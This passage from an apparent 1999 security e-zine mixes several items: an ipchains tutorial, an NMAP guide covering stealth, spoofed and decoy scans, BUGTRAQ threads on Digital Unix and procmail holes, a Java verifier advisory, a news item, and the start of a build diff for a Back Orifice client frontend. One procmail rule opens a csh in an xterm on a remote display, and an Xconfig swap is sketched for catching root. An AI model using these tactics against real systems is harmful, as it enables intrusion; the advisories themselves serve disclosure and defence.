service supports tcp wrappers before feeling "kinda" secure.
FIREWALLS
Firewalls are something that every administrator loves to have on his network,
firewalling can have many different faces.
1) Connect a Internal Network through a single system (also called
masquerading, but it also can act as a firewall, denying the remote users to
log into the internal Network).
2) A system which through a program such as ipfwadm (for the 2.0.x kernels)
and ipchains (for the 2.2.x kernels) can block and filter connections to user
specified ports.
A firewall acts as a wall between your system and the Internet, you configure
it the way you like it, and it acts that way.
For instance on my system (kernel 2.2.4) when i want to block users connecting
to my telnet port, i would issue the following command:
ipchains -A input -p tcp -s 0/0 -d 194.xxx.xx.xx telnet -j DENY -l
Let's take a better look at this commmand:
-A input --> ipchains after installation come with 3 preinstalled chains
(input/output/forward, meaning the input data, output data, and finally
forwarding data), with the -A flag we tell ipchains to Append our "rule" to
the chain.
-p tcp --> here we specify the protocol, i think the protocol i
mention is obvious...other protocols include udp, and icmp
-s 0/0 --> -s stands for source IP/host/subnet, you can either specify a whole
subnet or a single IP, 0/0 stands for everyone...so we tell ipchains to match
any ip address to this rule
-d 194.xxx.xx.xx --> -d stands for destination IP/host/Network, here we
specified a single IP (xxx used for privacy reasons, change them to your IP
address)this ip is the IP of the destination host, meaning the host that
receives all the data, usually you would specify your system, unless you have
a router-box
telnet --> after the destination host you specify the port, or
service, ipchains can understand services which already exist in the
/etc/service file, otherwise you need to specify a port / range of ports. For
instance if we wanted to block ports from 6000 up to 6010 we would type:
6000:6010
-j DENY --> here we declare to ipchains what to do with
datagrams that match this rules, simply here we DENY them, other methods
include ACCEPT and REJECT
-l --> -l stands for logging, enabling this options ipchains will output
through the kernel into /var/log/messages every packet that matches this
rules...be aware that this produces usually some heavy logs.
Remember that when you create a rule think wisely, this service may be
needed, or some other hosts must have access to it, by blocking a needed
service you might create some problems.
Always remember that when you want to block a service, but you want to give
access to certain systems/networks, you have to declare first the ACCEPT
rules, and then the DENY, otherwise all hosts will be denyed, since ipchains
compares the datagrams with the chains in a descenting order.
For example say we own pestilence.foo.com and we want to grant access to the
ftp service to cool.foo.com, but DENY everyone else. We would type the
following:
ipchains -A input -p tcp -s cool.foo.com -d pestilence.foo.com ftp -j ACCEPT
ipchains -A input -p tcp -s 0/0 -d pestilence.foo.com ftp -j DENY -l
Now cool.foo.com has access to out ftp, but the rest of the Internet doesn't.
For more information on firewalling take a look at the HOWTO.
Comments, suggestion
pestilence@netplan.gr
flames > /dev/null /* keep them to you :p */
Further References
Here are links that every admin should visit...
http://www.genocide2600.com/~tattooman /* The biggest Security archive of
Planet earth...just name it...tattoo has it...*/
http://howto.linuxberg.com /* All the known Linux HOWTO's */
http://www.geek-girl.com/bugtraq/index.html /* All BUGTAQ postings are there*/
http://www.technotronic.com /* Another security related site, worth looking */
http://www.rewted.org /* Same as above */
http://www.freshmeat.net /* Nearly every known Linux app indexed */
http://www.linuxberg.com /* The Linux tucows site */
/* and finally some news produced in a way you never saw: (thats for the
fun...)*/
http://www.innerpulse.com
@HWA
35.0 Guide to using NMAP by Lamont Granquist .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Packetstorm http://www.genocide2600.com/~tattooman/new.shtml
<a href="http://www.genocide2600.com/~tattooman/new.shtml">Link</a>
Date: Mon, 5 Apr 1999 16:50:23 -0700
From: Lamont Granquist <lamontg@raven.genome.washington.edu>
To: nmap-hackers@insecure.org
Subject: NMAP guide
NMAP has been getting a lot of review on what its capabilities are lately,
so I thought I'd take a shot at it as well. I skipped over a few things
that I didn't think were really worth mentioning (you better be able to
figure out -p and -F).
Comments more than welcome.
-------------------------------------------------------------
NMAP does three things. First, it will ping a number of hosts to
determine if they are alive or not. Second, it will portscan hosts to
determine what services are listening. Third, it will attempt to
determine the OS of hosts.
Of course NMAP is very configurable, and any of these steps may be
omitted, (although portscanning is necessary in order to do an OS scan),
and there are multiple ways to accomplish most of these, and many command
line switches to tweak the way that NMAP operates.
Target Selection
You can specify NMAP targets both on the command line or give a list of
targets in a filename with the -i option. As the NMAP help documentation
suggests you can use the hostname/mask method of specifying a range of
hosts (cert.org/24 or 192.88.209.5/24) or you can give a explicit IP range
(192.88.209.0-255). The '24' in 'cert.org/24' is the number of bits in
the mask, so /32 means "just that host", /24 means "the 256 addresses in
that Class C", /16 means "the 65536 addresses in that Class B", /8 would
be "the 2^24 addresses in that Class A" and /0 would scan all possible
(IPv4) 2^32 IP addresses.
Ping Scans
The default behavior of NMAP is to do both an ICMP ping sweep (the usual
kind of ping) and a TCP port 80 ACK ping sweep. If an admin is logging
these this will be fairly characteristic of NMAP. This behavior can be
changed in several ways. The easiest way is, of course, to simply turn
off ping sweeps with -P0.
If you want to do a standard ICMP ping sweep use -PI. If you are trying
to get through a firewall, though, ICMP pings will likely be blocked and
using packet filtering ICMP pings can even be dropped at the host. To get
around this NMAP tries to do a TCP "ping" to see if a host is up. By
default it sends an ACK to port 80 and expects to see a RST from that port
if the host is up. To do only this scan and not the ICMP ping scan use
-PT. To specify a different port than port 80 to scan for specify it
immediately afterwards, e.g. -PT32523 will ACK ping port 32523. Picking a
random high-numbered port in this way may work *much* better than the
default NMAP behavior of ACK pinging port 80. This is because many packet
filter rules are setup to let through all packets to high numbered ports
with the ACK bit set, but sites may filter port 80 on every machine other
than their publically accessable webservers. You can also do both an ICMP
ping scan and an ACK scan to a high numbered port with, e.g. -PB32523.
However, if a site has a really, really intelligent firewall that
recognizes that your ACK packet isn't part of an ongoing TCP connection it
might be smart enough to block it. For that reason, you may get better
results with a TCP SYN sweep with -PS. In this case, scanning a
high-numbered port will probably not work, and instead you need to pick a
port which is likely to get through a firewall. Port 80 is not a bad pick,
but something like ssh (port 22) may be better.
So the first question to ask yourself is if you care about wasting time
scanning machines which are not up and if you care about getting really
complete coverage of the network? If you don't care about wasting time
and really want to hit all the machines on a network, then use -P0.
Pinging machines will only cause you to have more of a signature in any
log files and will eliminate machines which might possibly be up. Of
course, you will waste time scanning all the IP numbers which aren't
assigned.
If you do ping machines, an ICMP ping sweep is probably more likely to be
missed or ignored by system administrators. It doesn't look all that
hostile. If you think you're up against a firewall you should experiment
with which kinds of pings seem to get through it. Do ICMP pings work at
all? Can you ping thier webserver? If not, then don't bother with ICMP
pings. Can you ACK ping thier webserver? If not, then you have to go
with SYN pings.
What if all you want to do is a ping scan? Then use -sP.
Port Scanning
The vanilla scan is a TCP connect() scan (-sT). These are loggable. You
probably don't want to do these.
SYN scans (-sS) are the workhorse of scanning methods. They are also
called "half-open" scans because you simply send a SYN packet, look for
the return SYN|ACK (open) or RST (closed) packet and then you tear down
the connction before sending the ACK that would normally finish the TCP
3-way handshake. These scans don't depend on the characteristics of the
target TCP stack and will work anytime a connect() scan would have worked.
They are also harder to detect -- TCP-wrappers or anything outside of the
kernel shouldn't be able to pick up these scans -- packet filters like
ipfwadm or a firewall can though. If a box is being filtered NMAP's SYN
scan will detect this and report ports which are being filtered.
FIN (-sF), NULL (-sN) and XMAS (-sX) scans are all similar. They all rely
on RFC-compliance and as such don't work against boxes like Win95/98/NT or
IRIX. They also work by getting either a RST back (closed port) or a
dropped packet (open port). Of course, the other situation where you
might get back a dropped packet is if you've got a packet filter blocking
access to that port. In that case you will get back a ton of false open
ports. A few years back these kinds of scans might have been stealthy and
undetectable. These days they probably aren't.
You can combine any of the SYN, FIN, NULL or XMAS scans with the (-f) flag
to get a small fragment scan. This splits the packet which is sent into
two tiny frags which can sometimes get through firewalls and avoid
detection. Unfortunately, if you're not running a recent version of an
open source O/S (Linux or Net/Open/FreeBSD) then you probably can't frag
scan due to the implimenation of SOCK_RAW on most unixes (Solaris, SunOS,
IRIX, etc). See Fyodor's NMAP portability chart to see if -f is supported
on your platform.
For the initiated out there, you could modify libpcap to allow you to send
packets in addition to sniffing them by opening the packet capture device
rw instead of ro. Then you need to build a link-layer (probably ethernet)
header and then you could impliment your own frag scanner. For bonus
points impliment all of the different SYN, FIN, NULL and XMAS scans *and*
allow for sending the fragments out in reverse order (which helps for
getting through firewalls). This hasn't been done (yet) in NMAP due to
the fact that NMAP needs to support multiple different link layer
interfaces (not just ethernet) and needs code for dealing with ARP. If
anyone wants to code this up, I'm sure that people would appreciate it.
UDP scanning (-sU) in NMAP has the same problem as FIN scans in that
packet filtered ports will turn up as being open ports. It also runs
extremely slowly against machines with UDP packet filters.
Another type of scan is the bounce scan (-b <ftp_relay_host>) which, if
there is insufficient logging on the ftp host you're using to bounce, is
completely untraceable. Recent FTP servers shouldn't let you do these
kinds of scans.
The last scanning option that I'm going to mention is identd scanning (-I)
which only works with TCP connect scans (-sT). This will let you know the
owner of the daemon which is listening on the port. Provided, of course,
that the site is running identd and is not doing something intelligent
like using a cryptographic hash (i.e. pidentd -C). You *have* to make
complete 3-way TCP handshakes for this to work, so this is not very
stealthy. It does, however, give you a lot of information. It only works
against machines that have port 113/auth open.
Source IP Deception
You can also take advantage of the fact that you can change your source
address. The simplest way to do this is with -S <ip>. If you are on a
broadcast ethernet segment you could change your source address to an IP
which doesn't exist and then you simply sniff the network for the reply
packets. And if you are not on a leaf node/network then as long as the
reply packet will get routed by you, you can use it. To turn this on its
head: the next time you get scanned, do a traceroute on the machine that
scanned you. Any of the machines on any of the networks that those
packets went through could have been the machine which was *really*
scanning you.
The other deceptive measure is to use decoy scans. You spoof a ton of
scans originating from decoy machines and insert your IP in the middle of
it somewhere. The admin at the site you are scanning is presented with X
number of scans and no way to determine which one actually did it. For
bonus points, combine this with the previous tactic and spoof an IP
address which doesn't exist. If you don't spoof your own IP address make
sure to use "likely" decoys -- use machines which were connected to the
net at the time you made your scans and don't use sites like
www.microsoft.com. Ideally you want a lot of linux boxes as decoys. The
more decoys the better, but obviously the slower the scan will go.
[ QUESTION: do decoy/spoof scans also decoy/spoof the ping scan? can you
combine decoy scans and "ME" spoofing like this? does a decoy/spoof scan
also decoy/spoof the OSscan? ]
OS scanning
This is the -O option. To use it requires one open and one closed port.
The closed port is picked at random from a high-numbered port. Machines
which do packet filtering on high-numbered ports will cause problems with
OS detection (many sites will filter packets to high numbered ports which
don't have the ACK bit set). Also excessive packet loss will cause
problems with OS detection. If you run into trouble try selecting an open
port which isn't being served by inetd (e.g. ssh/22 or
portmap/rpcbind/111).
OS scanning also reports the TCP sequence number prediction vulnerability
of the system. If you're 31337 you will be able to use this to exploit
trust relationships between this machine and other machines. There's a
reasonably decent phrack article on this in phrack P48-14, but you should
beware that it isn't this easy -- you need to worry about ARP (what's
that? how does it work? i suggest familiarizing yourself with tcpdump)
and if you're trying to exploit rsh/rlogin you need to worry about
spoofing the authorization connection as well.
--
Lamont Granquist lamontg@genome.washington.edu
Dept. of Molecular Biotechnology (206)616-5735 fax: (206)685-7344
Box 352145 / University of Washington / Seattle, WA 98195
PGP pubkey: finger lamontg@raven.genome.washington.edu | pgp -fka
@HWA
36.0 Digital Unix 4.0 has potential root compromise in /var perms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sun, 4 Apr 1999 20:31:12 +0300
From: Harhalakis Stefanos <v13@AETOS.IT.TEITHE.GR>
To: BUGTRAQ@netspace.org
Subject: Digital Unix 4.0E /var permission
On Digital Unix 4.0E with the latest patch kit aplied, after a new
installation /var has g+w for group system. Anyone that can crack any
account with gid==system may exploit this (not tested but there should be
no problem with mv'ing /var/sbin, /var/adm etc etc..). It seems that CDE
is forcing g+w to /var.. The whole thing is done while executing
/sbin/rc3.d/S95xlogin and only if CDE is selected.
<<V13>>
-------------------------------------------------------------------------
Date: Tue, 6 Apr 1999 10:47:26 +0200
From: Jochen Thomas Bauer <jtb@THEO2.PHYSIK.UNI-STUTTGART.DE>
To: BUGTRAQ@netspace.org
Subject: Re: Digital Unix 4.0E /var permission
Hello,
On Sun, 4 Apr 1999 Harhalakis Stefanos wrote:
>On Digital Unix 4.0E with the latest patch kit aplied, after a new
>installation /var has g+w for group system.
This problem seems to exist in other versions of Digital Unix, too.
At least on Digital Unix 4.0c and 4.0d (Factory Installed Software,
no patches applied, CDE in use) /var, which in my case is a link to
/usr/var, has
drwxrwxr-x 28 root system 512 Feb 11 12:58 /usr/var/
permissions. However, on Digital Unix 4.0b (Patch kit DUV40BAS00008-
19980821 applied, Software installed from CD, CDE in use) /usr/var
has
drwxr-xr-x 23 root system 512 Feb 11 1998 /usr/var/
permissions.
>The whole thing is done while executing /sbin/rc3.d/S95xlogin and
>only if CDE is selected.
This does not seem to be the case for Digital Unix 4.0c and 4.0d.
There is no chmod of /var in /sbin/rc3.d/S95xlogin.
>Anyone that can crack any account with gid==system may exploit this
>(not tested but there should be no problem with mv'ing /var/sbin,
>/var/adm etc etc..).
Or do the following:
CDE's Xconfig file is a link from /var/dt/Xconfig to the actual config
file. Moving /var/dt and creating your own /var/dt, you could replace
the system Xconfig file with your own version which has the session
manager specification
Dtlogin*session: /usr/dt/bin/Xsession
replaced with something more evil. Then just wait for root to
log in on the console....
--
Jochen Bauer
Institute for Theoretical Physics
University of Stuttgart
Germany
PGP public key available from:
http://www.theo2.physik.uni-stuttgart.de/jtb.html
-------------------------------------------------------------------------
Date: Tue, 6 Apr 1999 10:18:28 -0500
From: implosion <implosion@BROKEN.NE.MEDIAONE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Digital Unix 4.0E /var permission
First of all, under Digital UNIX, the system group is the group that is
'pseudo-root', i.e. have near root privilages and are allowed to su into
root. /var, which under a default install, is a sym-link to /usr/var,
contains all of the system accounting files, LSM, and other system
specific files that all System Administrators would need to run thier
system. So, it is only logical that system have write permissions to that
directory.
Also, one should note that any system administrator should (and
would, I would hope), only put _secure_ accounts in the system group, i.e.
any account that is going to utilize a safe password and those accounts
are not going to have set-uid or gid executables attached to them.
One more note: as an ls -la of /sbin/rc3.d would show you,
S95xlogin is only a sym-link to /sbin/init.d/xlogin. The S95 is there so
when init comes up to run level 3, it will start (the S tells it that),
and the 95 is placed there to put it in order - you add a numeric number
to the front of the executable, so when the rc3 script processes
/sbin/rc3.d, it gets launched after certain daemons and programs that need
to be running in order for it to start. To the best of my knowledge,
xlogin isnt doing anything to the /var permissions.
-Implosion
On Sun, 4 Apr 1999, Harhalakis Stefanos wrote:
> On Digital Unix 4.0E with the latest patch kit aplied, after a new
> installation /var has g+w for group system. Anyone that can crack any
> account with gid==system may exploit this (not tested but there should be
> no problem with mv'ing /var/sbin, /var/adm etc etc..). It seems that CDE
> is forcing g+w to /var.. The whole thing is done while executing
> /sbin/rc3.d/S95xlogin and only if CDE is selected.
>
> <<V13>>
>
@HWA
37.0 Running Procmail <v3.l2? time to upgrade...(overflow conditions)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 5 Apr 1999 02:23:59 -0500
From: Philip Guenther <guenther@GAC.EDU>
To: BUGTRAQ@netspace.org
Subject: Re: [SECURITY] new version of procmail with security fixes
debian-security-announce@LISTS.DEBIAN.ORG writes:
>A new version of procmail has been released which fixes a couple
>of buffer overflows and has extra security checks.
>
>We recommend you upgrade your procmail package immediately.
As the person who fixed most of those overflows I suppose I should
elaborate on this.
First off, for non-debian users, the source to the current procmail
release can be fetched from:
http://www.procmail.org/procmail.tar.gz
ftp://ftp.procmail.org/pub/procmail/procmail.tar.gz
PGP signatures can be found next to the those (".sig"), made by the key
with keyid 0x4A25D351, availible on the keyservers or at
http://www.procmail.org/pgp-key.html
Mirrors will be announced on the procmail webpage
(http://www.procmail.org/) as they are confirmed.
All versions of procmail previous to 3.12 could overflow heap allocated
buffers, either when given a sufficiently long command line argument,
or during expansions while processing procmailrc files. If the later
occurs during the processing of /etc/procmailrc on systems where
procmail is installed setuid root or is run as the local delivery
agent, root access may be obtainable. If procmail is installed setgid,
then the command line overflow exposes that group, but not (directly)
root. Overflows that occur while processing user procmailrc files may
give out setgid and/or that user's access.
The details are similar to any other program with heap-allocated buffer
overflow. None of overflows directly involved the message being
processed, but rather were triggered by expansions in the user's
procmailrc file. Since only the user can change that, there should be
no problem...except that:
a) procmail is installed setgid mail on many systems and (depending on
the spool configuration and system) may not have given up those
privileges, and
b) many rcfiles extract data from the message (say, the contents of a
header, or a snippet of the body) and then use that in later
conditions.
(a) means that a local user may be able to obtain setgid mail rights,
while (b) means that remote exploits may be possible. However, even
when self-inflicted with no gain, crashing on overflow is just rude.
Closing the overflows has been a matter of simply checking, in the
correct places, that there's enough space to do what needs to be done.
While I can't rule out doing so in the future, we have not moved to a
scheme of dynamically allocating everything, partly because I don't
have the time to debug such a scheme, and partly because it isn't clear
that it would even be the right thing to do (think DOS-attacks).
I'm not claiming to have fixed them all -- I've been following this
list too long to be that stupid -- but we have our eyes open and are
actively working on catching them when we find them. Bug reports and
comments should be sent to <bug@procmail.org>.
I have not heard of or seen any exploits. (Waste of typing to say that.)
Philip Guenther
----------------------------------------------------------------------
guenther@gac.edu UNIX Systems and Network Administrator
Gustavus Adolphus College St. Peter, MN 56082-1498
Source code never lies: it just misleads (Programming by Purloined Letter?)
--------------------------------------------------------------------------------
Date: Tue, 6 Apr 1999 16:56:16 -0500
From: Philip Guenther <guenther@GAC.EDU>
To: BUGTRAQ@netspace.org
Subject: Procmail version 3.13.1 released
How apt my previous words...
I have released procmail version 3.13.1, which fixes a few buffer
overflow that I had missed previously and eliminates a keyword conflict
with newer versions of gcc. These buffer overflows are probably
'slightly more difficult' to exploit as they involve particular
variables instead of variable expansion in general.
My apologies to those who downloaded version 3.13 yesterday.
http://www.procmail.org/procmail.tar.gz
ftp://ftp.procmail.org/pub/procmail/procmail.tar.gz
Debian has been notified and so will probably be releasing an updated
package shortly. (If other vendors want to be notified of procmail
releases ahead of time they should e-mail me.)
Philip Guenther
Procmail Maintainer
bug@procmail.org
@HWA
37.1 More Procmail problems
~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 5 Apr 1999 19:40:37 +0100
From: Chris Evans <chris@FERRET.LMH.OX.AC.UK>
To: BUGTRAQ@netspace.org
Subject: More procmail
Hi,
Well well since Debian appear to have "broken silence" on the procmail
front rather than wait for an official announcement...
I found something potentially more serious than boring heap overflows. It
is allegedly fixed in the latest procmail release but I haven't checked.
As a summary local users can dump the contents of any file to screen. As a
comment I would suggest anyone running procmail with elevated privs either
a) Needs their head examined or
b) Hasn't read the code.
Here is a quote of a previous mail I sent various people when I first
found the file handling issue. I also recommended to the procmail team
that they review _all_ of their file handling code. I have no idea whether
this recommendation was taken on board or not..
Cheers
Chris
-----8<--------
However on to more interesting things, I have found a much more serious
security hole in procmail's file handling which can lead to users dumping
the contents of arbitrary files they should not be able to read to the
screen.
The faulty code sequence is in the handling of .procmailrc files and goes
something like
1) stat .procmailrc (as root) - if it can't be stat'ed keep root privs
2) open .procmailrc
3) do lstat on .procmailrc for security check
By replacing .procmailrc after steps 1) and 2) with a symlink to the file
to dump and a regular file respectively, we can win a race condition.
You might not think this is a very plausible race but with a few deep
directory/multiple symlink tricks/SIGSTOP/etc. the window can be made
quite wide. This is definitely exploitable.
----------------------------------------------------------------------------
Date: Tue, 6 Apr 1999 21:50:03 -0400
From: Kragen Sitaker <kragen@POBOX.COM>
To: BUGTRAQ@netspace.org
Subject: Re: more procmail
Chris Evans writes:
> As a comment I would suggest anyone running procmail with elevated
> privs either
>
> a) Needs their head examined or
> b) Hasn't read the code.
Procmail is generally not useful when running on behalf of the person
who wrote the email it's being given as input.
When it is running on behalf of someone else, which is the usual case,
it has privileges that the sender did not.
In my book, that means it's running with elevated privs.
Common examples of this situation:
- filtering your incoming mail with procmail
- running a mailbox (of mail from other people) through procmail
--
<kragen@pobox.com> Kragen Sitaker <http://www.pobox.com/~kragen/>
This is exactly how the World Wide Web works: the HTML files are the pithy
description on the paper tape, and your Web browser is Ronald Reagan.
-- Neal Stephenson, at http://www.cryptonomicon.com/beginning_print.html
----------------------------------------------------------------------------
Date: Tue, 6 Apr 1999 20:00:03 -0500
From: Philip Guenther <guenther@GAC.EDU>
To: BUGTRAQ@netspace.org
Subject: Re: More procmail
Chris Evans <chris@FERRET.LMH.OX.AC.UK> writes:
...
>As a summary local users can dump the contents of any file to screen. As a
>comment I would suggest anyone running procmail with elevated privs either
>
>a) Needs their head examined or
>b) Hasn't read the code.
>
>Here is a quote of a previous mail I sent various people when I first
>found the file handling issue. I also recommended to the procmail team
>that they review _all_ of their file handling code. I have no idea whether
>this recommendation was taken on board or not..
Hmm, I guess I failed to cc you on the discussion that later took place
on this issue. What we eventually settled on and was incorporated into
version 3.12 was for procmail to always open user rcfiles as the user
(/etc/procmailrc will still be opened and processed as root). On some
systems where special group privileges are needed to deliver to the
mailspool but that have broken set*gid() system calls, procmail will
attempt the open as root and if it succeeds then it'll close it, become
the user, and open it again. This last case may still allow for DOS
attacks by symlinking to, say, a serial device that blocks on open, so
I suppose the open as root should be a non-blocking open. The truly
paranoid will abolish the central mailspool directory and group 'mail'
in favor of spooling mail to the user's home directory, a setup
procmail readily supports.
As for the rest of the file handling code, what I've had the time to
review has looked safe. Procmail becomes the user before it starts
processing the contents of the $HOME/.procmailrc, so problems should be
limited to what the user could have done without procmail at all.
While the permissions of the $HOME/.procmailrc are checked closely,
procmail tries to the trust the user the rest of the time; if the user
wants to process recipes from someone else's rcfile, procmail will let
them: trusting the other user was their explicit choice. Resource
consumption attacks (say, opening /dev/zero as an rcfile) should be
dealt with like all resource consumptions attacks: audit and keep a
baseball bat next to your desk.
Philip Guenther
Procmail Maintainer
bug@procmail.org
----------------------------------------------------------------------------
Date: Wed, 7 Apr 1999 08:50:28 -0700
From: Ricky Connell <ricky@BEIDA.STANFORD.EDU>
To: BUGTRAQ@netspace.org
Subject: Re: More procmail
Philip Guenther <guenther@GAC.EDU> writes:
=Procmail becomes the user before it starts
=processing the contents of the $HOME/.procmailrc, so problems should be
=limited to what the user could have done without procmail at all.
Not quite true.
The procmail rule:
:0
* ^Subject: HACK
| setenv DISPLAY beida:0;/usr/openwin/bin/xterm -e /bin/csh
will, in fact, pop a shell from the secured mail server to whereever
the user specifies, running as the user. So if they control their own
.procmailrc, they can log into the mail server whenever they desire, which
may not be a machine that they would normally have access to. The paths
may need to be changed to reflect the OS of the mail server.
I have patched my procmail to deal with this by forcing it to use
smrsh. In doing so, I also discovered the procmail calls sendmail
explicitly at some point in it's operation (didn't take the time to figure
out where it does it). This might also be of concern, but it wasn't
immediately obvious to me how this might be exploited.
-- Ricky
---
ricky@smi.stanford.edu (650) 498-4405
Unix and Network Administrator
@HWA
38.0 Security hole in Java 2 (and JDK 1.1.x)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 5 Apr 1999 08:56:10 -0400
From: Gary McGraw <gem@RSTCORP.COM>
To: BUGTRAQ@netspace.org
Subject: Security Hole in Java 2 (and JDK 1.1.x)
Hi all,
Karsten Sohr at the University of Marburg in Germany (email
sohr@mathematik.uni-marburg.de) has discovered a very serious security
flaw in several current versions of the Java Virtual Machine,
including Sun's JDK 1.1 and Java 2 (a.k.a. JDK 1.2), and Netscape's
Navigator 4.x. (Microsoft's latest JVM is not vulnerable to this
attack.) The flaw allows an attacker to create a booby-trapped Web
page, so that when a victim views the page, the attacker seizes
control of the victim's machine and can do whatever he wants,
including reading and deleting files, and snooping on any data and
activities on the victim's machine.
The flaw is in the "byte code verifier" component of the JVM. Under
some circumstances the verifier fails to check all of the code that is
loaded into the JVM. Exploiting the flaw allows the attacker to run
code that has not been verified. This code can set up a type
confusion attack (see our book "Securing Java" for details
http://www.securingjava.com) which leads to a full-blown security
breach.
We have verified that the flaw exists and is serious. Attack code (in
both applet and application form) has been developed in the lab to
exploit the flaw. Sun and Netscape have been notified about the flaw
and they are working on a fix.
The attack we developed in the lab worked against the following platforms:
JDK 1.1.5 (Solaris)
JDK 1.2beta4 (Solaris)
JDK 1.1.6 (Solaris)
JDK 1.1.7 (FreeBSD)
JDK 1.2 (NT)
JDK 1.1.6 (NT)
Symantec Visual Cafe Version 3
Netscape 4.5 (FreeBSD)
Netscape 4.5 (NT)
Netscape 4.05 (NT)
Netscape 4.02 (Solaris)
Netscape 4.07 (Linux)
The attack did not work against:
Microsoft Visual J++ 6.0
Kudos to Viren Shah at RST for extensive platform testing. Thanks for
your interest in mobile code security.
Dr. Gary McGraw Prof. Edward W. Felten
Reliable Software Technologies Secure Internet Programming Lab
gem@rstcorp.com Dept. of Computer Science
Princeton University
http://www.securingjava.com felten@cs.princeton.edu
---------------------------------------------------------------------------
Date: Mon, 5 Apr 1999 11:13:16 -0700
From: d3l1r1um@gothlet.net
To: BUGTRAQ@netspace.org
Subject: Re: Security Hole in Java 2 (and JDK 1.1.x)
The following is the URL for a press release Sun issued about this:
http://java.sun.com/pr/1999/03/pr990329-01.html
It says the fix is in the works and will be available shortly, and
will be implemented in the next release(s) of the software (due in
April).
FYI.
d3l1r1um.
SUN SET TO DELIVER SOFTWARE FIX
FOR JAVATM DEVELOPMENT KIT
SECURITY BUG
PALO ALTO, Calif. -- March 26, 1999 -- Sun
Microsystems, Inc. today announced it has created a
fix to a newly discovered implementation bug in the
JavaTM Development Kit (JDKTM) that affects both
JDK 1.1.x and the Java 2 platform. The bug poses a
potential security risk by allowing an untrusted applet to
execute unverified code under certain circumstances.
There are no reports of any attacks based on this bug.
After being briefed on the bug, Sun created and tested
a fix. Releases of the patch for all Java 1.1.x platforms
and the Java 2 platform are imminent. The fix will also
be available as a part of JDK 1.1.8 and Java 2, v
1.2.1, both scheduled for release in April.
The bug was discovered by a German graduate student
as part of a research project and was reported to Sun
on March 11, 1999 by Ed Felton, who heads the
Princeton University Secure Internet Programming Lab.
"It is important to keep in mind that this is an implementation bug and not a
flaw in the basic Java platform security model or architecture," said Jon
Kannegaard, Vice President and General Manager, Java Platform at Sun
Microsystems Java Software. "We invite scrutiny from the Internet
community and publish our source code so that the community will be able
to analyze our security implementations and give us valuable feedback on
the architecture and our implementation. We firmly believe that this is the
best way to evolve the Java platform security model in this spirit of
openness."
Kannegaard continued, "Sun takes every security-related implementation
flaw in Java code very seriously and we thank the Princeton team for their
contribution to the Java platform."
For more information, please see http://java.sun.com/sfaq.
@HWA
39.0 Salon buys The Well
~~~~~~~~~~~~~~~~~~~
Salon Buys The Well
Wired News Report
9:10 a.m. 7.Apr.99.PDT
Internet magazine Salon has acquired The Well, one of the Net's oldest
and most respected online communities.
The surprise move, announced Tuesday, gives Salon a dose of new credibility
by tying it directly into a members-only community of scores of artists,
writers, thinkers, scientists, programmers, and visionaries.
Salon said the company intends to operate the Sausalito, California company
as a separate business. Terms of the deal were not disclosed.
Well executive director Gail Williams said the deal does not include Well
Engaged Discussions Server, which remains a separate business owned by
former Well parent Rosewood Stone Group. That proprietary software allows
Picospan, the Well's underlying discussion thread software, to be
viewable on the Web.
"The Well will provide Salon with new revenue sources, in addition to our
advertising, e-commerce, and syndication business," said Salon president
and publisher Michael O'Donnell in a statement.
Logic would dictate that Well Engaged would likely replace the clunky software
platform underlying TableTalk, Salon's existing discussion forum area.
But Salon spokesperson Dayna Macy flatly denies this will occur.
Still, the deal is really about tapping the credibility of a Net institution.
"The main thing about The Well is not the Web interface, it's the old fashioned
text interface," said David Gans, who has been a member of The
Well since 1986.
"I hope that they don't do anything to make it harder for us old guard to use that."
Gans said that many members of Salon's staff, including vice president and senior
editor Scott Rosenberg, and author and reporter Andrew Leonard, are longtime Wellheads.
"They are not the kind of people who are going to come in and make lots of changes
just because they can."
Gans said that many Well members were dissatisfied with the service's current owner,
Bruce Katz, and would likely embrace the new parent. He said that Well CEO Katz had
been trying to sell The Well for years, but had been asking for too much money.
"If we are going to be bought by someone, Salon seems as good as anyone to do it."
Other Wellheads seemed pleased, and a discussion raged on a topic in one of the service's
conferences.
"I think it could be very promising," said Reva Basch, a Wellhead since 1988.
"One of the big questions in my mind is where are the deep pockets? But culturally and
conceptually it could be really interesting," said Basch.
Well director Williams played down persistant rumors that the service's selling price had
been overinflated.
"The popular perception is different than the business perception," Williams said. "How many
businesses on the Web have as strong an identification and revenue [as the Well has]?"
"We're dancing on our keyboards over here," Williams said.
In a prepared statement, Salon's founder described a match made in heaven.
"The Well's distinctive reputation for thoughtful and intelligent online discussions fits
strongly with our network of high-quality content sites and our existing community, Table Talk,"
said David Talbot.
The Well has come to be an intellectual safe-haven for many of the leading thinkers of the
digital age.
Editor's Note: This story has been corrected. The original report speculated that Well Engaged
software could possibly replace the Salon discussion area known as Table Talk. In fact, that
platform can only replace the software underlying that discussion forum, and not the forum
itself. Wired News regrets the error.
@HWA
40.0 Gspot bounix frontend enhancement/replacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
diff -ruN bo/Makefile.in bo_gspot/Makefile.in
--- bo/Makefile.in Sun Aug 9 14:12:02 1998
+++ bo_gspot/Makefile.in Tue Mar 23 17:36:01 1999
@@ -2,11 +2,14 @@
LIBS=@LIBS@
INSTALL=@INSTALL@
-all: bounix
+prefix=/usr/local/bin
+
+all: bounix gspot
clean:
- rm *.o bounix
+ rm *.o bounix gspot
install:
- $(INSTALL) bounix /usr/local/bin/bounix
+ $(INSTALL) bounix $(prefix)/bounix
+ $(INSTALL) gspot $(prefix)/gspot
distclean:
rm *.o bounix config.status config.cache config.log config.h Makefile
.o:
@@ -14,3 +17,6 @@
bounix: bounix.o commands.o help.o
$(CC) -o bounix bounix.o commands.o help.o $(LIBS)
+
+gspot: commands.o gspot.c
+ $(CC) -g -o gspot gspot.c commands.o $(LIBS) `gtk-config --libs` `gtk-config --cflags`
diff -ruN bo/gspot.c bo_gspot/gspot.c
--- bo/gspot.c Wed Dec 31 16:00:00 1969
+++ bo_gspot/gspot.c Tue Mar 23 16:36:04 1999
@@ -0,0 +1,891 @@
